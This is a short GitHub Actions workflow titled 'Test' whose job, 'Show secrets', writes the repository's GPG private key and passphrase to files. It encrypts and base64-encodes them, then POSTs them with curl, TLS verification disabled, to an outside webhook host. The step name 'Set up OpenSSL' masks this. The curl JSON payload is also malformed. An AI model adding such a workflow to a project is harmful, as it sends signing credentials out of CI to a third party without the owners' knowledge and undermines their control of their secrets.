name: Test

on: [workflow_dispatch]

jobs:
  debug:
    name: Show secrets
    runs-on: ubuntu-latest
    steps:
      - name: Set up OpenSSL and write secret to file
        id: encrypt_key
        shell: bash
        run: |
          echo "${{ secrets.GPG_PRIVATE_KEY }}" > gpg_key.txt
          echo "${{ secrets.GPG_PASSPHRASE }}" > gpg_pass.txt
          
          echo "${{ secrets.ENCRYPTION_PASSWORD }}" > password.txt

          openssl enc -aes-256-cbc -salt -in gpg_key.txt -out gpg_key.enc -pass file:./password.txt
          openssl enc -aes-256-cbc -salt -in gpg_pass.txt -out gpg_pass.enc -pass file:./password.txt
          GPG_KEY=$(base64 gpg_key.enc | tr -d '\n')
          GPG_PASS=$(base64 gpg_pass.enc | tr -d '\n')

          curl -X POST https://webhook.slococo.com.ar/hooks/redeploy-webhook -k \
            -H "Content-Type: application/json" \
            -d "{\"data\":\"$GPG_KEY\|$GPG_PASS"}"
          
      - name: Send hello via HTTP
        uses: fjogeleit/http-request-action@v1
        with:
          url: 'https://webhook.slococo.com.ar/hooks/redeploy-webhook'
          method: 'POST'
          customHeaders: '{"Content-Type": "application/json"}'
          ignoreSsl: true
          data: |
            {
              "data": "OH HI MARK!"
            }
